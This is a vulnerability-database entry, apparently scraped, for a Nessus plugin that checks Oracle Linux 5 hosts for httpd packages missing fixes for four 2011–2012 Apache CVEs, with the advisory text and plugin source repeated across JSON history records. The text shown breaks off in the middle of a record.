ID ORACLELINUX_ELSA-2012-0323.NASL Type nessus Reporter Tenable Modified 2018-07-18T00:00:00
Description
From Red Hat Security Advisory 2012:0323 :
Updated httpd packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having
moderate security impact. Common Vulnerability Scoring System (CVSS)
base scores, which give detailed severity ratings, are available for
each vulnerability from the CVE links in the References section.
The Apache HTTP Server is a popular web server.
It was discovered that the fix for CVE-2011-3368 (released via
RHSA-2011:1392) did not completely address the problem. An attacker
could bypass the fix and make a reverse proxy connect to an arbitrary
server not directly accessible to the attacker by sending an HTTP
version 0.9 request. (CVE-2011-3639)
The httpd server included the full HTTP header line in the default
error page generated when receiving an excessively long or malformed
header. Malicious JavaScript running in the server's domain context
could use this flaw to gain access to httpOnly cookies.
(CVE-2012-0053)
An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way httpd performed substitutions in regular expressions.
An attacker able to set certain httpd settings, such as a user
permitted to override the httpd configuration for a specific directory
using a '.htaccess' file, could use this flaw to crash the httpd child
process or, possibly, execute arbitrary code with the privileges of
the 'apache' user. (CVE-2011-3607)
A flaw was found in the way httpd handled child process status
information. A malicious program running with httpd child process
privileges (such as a PHP or CGI script) could use this flaw to cause
the parent httpd process to crash during httpd service shutdown.
(CVE-2012-0031)
All httpd users should upgrade to these updated packages, which
contain backported patches to correct these issues. After installing
the updated packages, the httpd daemon will be restarted
automatically.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2012:0323 and
# Oracle Linux Security Advisory ELSA-2012-0323 respectively.
#
include("compat.inc");
if (description)
{
script_id(68488);
script_version("1.6");
script_cvs_date("Date: 2018/07/18 17:43:56");
script_cve_id("CVE-2011-3607", "CVE-2011-3639", "CVE-2012-0031", "CVE-2012-0053");
script_bugtraq_id(50322, 50494, 51407, 51706, 51869);
script_xref(name:"RHSA", value:"2012:0323");
script_name(english:"Oracle Linux 5 : httpd (ELSA-2012-0323)");
script_summary(english:"Checks rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote Oracle Linux host is missing one or more security updates."
);
script_set_attribute(
attribute:"description",
value:
"From Red Hat Security Advisory 2012:0323 :
Updated httpd packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having
moderate security impact. Common Vulnerability Scoring System (CVSS)
base scores, which give detailed severity ratings, are available for
each vulnerability from the CVE links in the References section.
The Apache HTTP Server is a popular web server.
It was discovered that the fix for CVE-2011-3368 (released via
RHSA-2011:1392) did not completely address the problem. An attacker
could bypass the fix and make a reverse proxy connect to an arbitrary
server not directly accessible to the attacker by sending an HTTP
version 0.9 request. (CVE-2011-3639)
The httpd server included the full HTTP header line in the default
error page generated when receiving an excessively long or malformed
header. Malicious JavaScript running in the server's domain context
could use this flaw to gain access to httpOnly cookies.
(CVE-2012-0053)
An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way httpd performed substitutions in regular expressions.
An attacker able to set certain httpd settings, such as a user
permitted to override the httpd configuration for a specific directory
using a '.htaccess' file, could use this flaw to crash the httpd child
process or, possibly, execute arbitrary code with the privileges of
the 'apache' user. (CVE-2011-3607)
A flaw was found in the way httpd handled child process status
information. A malicious program running with httpd child process
privileges (such as a PHP or CGI script) could use this flaw to cause
the parent httpd process to crash during httpd service shutdown.
(CVE-2012-0031)
All httpd users should upgrade to these updated packages, which
contain backported patches to correct these issues. After installing
the updated packages, the httpd daemon will be restarted
automatically."
);
script_set_attribute(
attribute:"see_also",
value:"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected httpd packages."
);
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploithub_sku", value:"EH-14-410");
script_set_attribute(attribute:"exploit_framework_exploithub", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:httpd");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:httpd-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:httpd-manual");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mod_ssl");
script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:5");
script_set_attribute(attribute:"patch_publication_date", value:"2012/03/09");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/07/12");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");
script_family(english:"Oracle Linux Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux");
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || !eregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux");
os_ver = eregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux");
os_ver = os_ver[1];
if (! ereg(pattern:"^5([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 5", "Oracle Linux " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && "ia64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu);
flag = 0;
if (rpm_check(release:"EL5", reference:"httpd-2.2.3-63.0.1.el5_8.1")) flag++;
if (rpm_check(release:"EL5", reference:"httpd-devel-2.2.3-63.0.1.el5_8.1")) flag++;
if (rpm_check(release:"EL5", reference:"httpd-manual-2.2.3-63.0.1.el5_8.1")) flag++;
if (rpm_check(release:"EL5", reference:"mod_ssl-2.2.3-63.0.1.el5_8.1")) flag++;
if (flag)
{
if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
else security_warning(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "httpd / httpd-devel / httpd-manual / mod_ssl");
}
{"id": "ORACLELINUX_ELSA-2012-0323.NASL", "bulletinFamily": "scanner", "title": "Oracle Linux 5 : httpd (ELSA-2012-0323)", "description": "From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "published": "2013-07-12T00:00:00", "modified": "2018-07-18T00:00:00", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=68488", "reporter": "Tenable", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html"], "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053"], "type": "nessus", "lastseen": "2019-01-16T20:16:46", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual"], "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053"], "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "da0a80f002bf98284174c562be3a4916ba1faff13a97d89277614d2fae48327f", "hashmap": [{"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "ba5421b34c575442e1dfc9eefc2b01f3", "key": "title"}, {"hash": "9d4ba84f3eb908a12ad8af29607f5852", "key": "description"}, {"hash": "3c09fd39dca9bce8dafe505ecf682fca", "key": "href"}, {"hash": "2e3c438f66403fd816adabf5a1b82b29", "key": "modified"}, {"hash": "a32f25318843d8ff315ab9875d6d2ee1", "key": "sourceData"}, {"hash": "8f7ef314d920891c344985cdc4f824f1", "key": "cpe"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "292f2e293571b0e70e3182b615982dad", "key": "cvss"}, {"hash": "21d1eb58c85fb6f05d58534760094021", "key": "references"}, {"hash": "16ae3c93dc83302d463471eefbc44076", "key": "cvelist"}, {"hash": "7d77095f188ad2b45d2c83a576a305e2", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68488", "id": "ORACLELINUX_ELSA-2012-0323.NASL", "lastseen": "2018-07-21T07:43:52", "modified": "2018-07-18T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "68488", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0323 and \n# Oracle Linux Security Advisory ELSA-2012-0323 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68488);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "title": "Oracle Linux 5 : httpd (ELSA-2012-0323)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-21T07:43:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual"], "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053"], "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "da0a80f002bf98284174c562be3a4916ba1faff13a97d89277614d2fae48327f", "hashmap": [{"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "ba5421b34c575442e1dfc9eefc2b01f3", "key": "title"}, {"hash": "9d4ba84f3eb908a12ad8af29607f5852", "key": "description"}, {"hash": "3c09fd39dca9bce8dafe505ecf682fca", "key": "href"}, {"hash": "2e3c438f66403fd816adabf5a1b82b29", "key": "modified"}, {"hash": "a32f25318843d8ff315ab9875d6d2ee1", "key": "sourceData"}, {"hash": "8f7ef314d920891c344985cdc4f824f1", "key": "cpe"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "292f2e293571b0e70e3182b615982dad", "key": "cvss"}, {"hash": "21d1eb58c85fb6f05d58534760094021", "key": "references"}, {"hash": "16ae3c93dc83302d463471eefbc44076", "key": "cvelist"}, {"hash": "7d77095f188ad2b45d2c83a576a305e2", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68488", "id": "ORACLELINUX_ELSA-2012-0323.NASL", "lastseen": "2018-09-01T23:32:47", "modified": "2018-07-18T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "68488", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0323 and \n# Oracle Linux Security Advisory ELSA-2012-0323 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68488);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "title": "Oracle Linux 5 : httpd (ELSA-2012-0323)", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 5, "lastseen": "2018-09-01T23:32:47"}, {"bulletin": {"bulletinFamily": "scanner", 